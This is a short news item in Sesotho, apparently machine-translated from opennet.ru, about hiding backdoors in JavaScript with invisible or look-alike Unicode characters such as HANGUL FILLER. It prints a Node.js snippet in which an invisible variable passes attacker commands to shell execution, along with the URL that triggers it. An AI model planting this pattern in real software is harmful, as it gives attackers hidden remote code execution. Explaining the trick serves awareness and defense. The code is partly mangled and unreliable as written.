Ka mor'a mokhoa oa tlhaselo oa Trojan Source, o itšetlehileng ka tšebeliso ea litlhaku tsa Unicode tse fetolang tatellano ea pontšo ea mongolo oa bobeli, mokhoa o mong oa ho hlahisa liketso tse patiloeng o hatisitsoe, o sebetsang ho khoutu ea JavaScript. Mokhoa o mocha o ipapisitse le tšebeliso ea "ㅤ" (code 0x3164, "HANGUL FILLER"), e leng karolo ea sehlopha sa litlhaku, empa e se na litaba tse bonahalang. Sehlopha sa Unicode seo sebapali sena e leng sa sona se lumelletsoe ho tloha ho ECMAScript 2015 ho sebelisoa mabitso a feto-fetohang a JavaScript, ho etsa hore ho khonehe ho theha mefuta e sa bonahaleng kapa mefuta e mecha e ke keng ea khetholleha ho tse ling tsa bahlophisi ba khoutu ba tsebahalang joalo ka Notepad ++ le VS Code.
E le mohlala, ho fanoe ka khoutu ea sethaleng sa Node.js, moo, ho sebelisoa phetoho e nang le sebopeho se le seng "ㅤ", ho patiloe monyako o ka morao o lumellang ho phethahatsa khoutu e boletsoeng ke mohlaseli: app.get('/ network_health', async (req, res) => {const {timeout,ㅤ} = req.query; // ha e le hantle e re "consst {timeout,ㅤ \u3164}" const checkCommands = ['ping -c 1 google. com', 'curl -s http:// example.com/',ㅤ // phegelwana e latelwa ke tlhaku \u3164 ];
Ha u sheba ka lekhetlo la pele, ke boleng ba nako ea ho qeta nako feela bo fetisoang ka parameter e ka ntle, 'me lenane le nang le litaelo tse lokelang ho phethoa le na le lenane le tsitsitseng le se nang kotsi. Empa ha e le hantle, ka mor'a ho fetoha ha nako, boleng ba ntho e 'ngoe e sa bonahaleng e nang le khoutu ea sebopeho \u3164 e abeloa, e boetse e nkeloa sebaka ke letoto la litaelo tse ka phethoang. Kahoo, haeba moralo o joalo o le teng, mohlaseli a ka romela kopo e kang "https://host:8080/network_health?%E3%85%A4=command" ho kenya kamore e ka morao le ho phethahatsa khoutu ea bona.
Mohlala o mong ke sebopeho "ǃ" (ALVEOLAR CLICK), se ka sebelisoang ho fana ka ponahalo ea ho supa letšoao la mohoo. Mohlala, poleloana "if(environmentǃ=ENV_PROD){" ha e phethisoa ho Node.js 14 e tla lula e le 'nete, kaha ha e hlahlobe phapang, empa e fana ka boleng ba ENV_PROD ho "tikolohoǃ" e fapaneng. Litlhaku tse ling tse khelosang tsa unicode li kenyelletsa "/", "−", "+", "⩵", "❨", "⫽", "꓿" le "∗".
Source: opennet.ru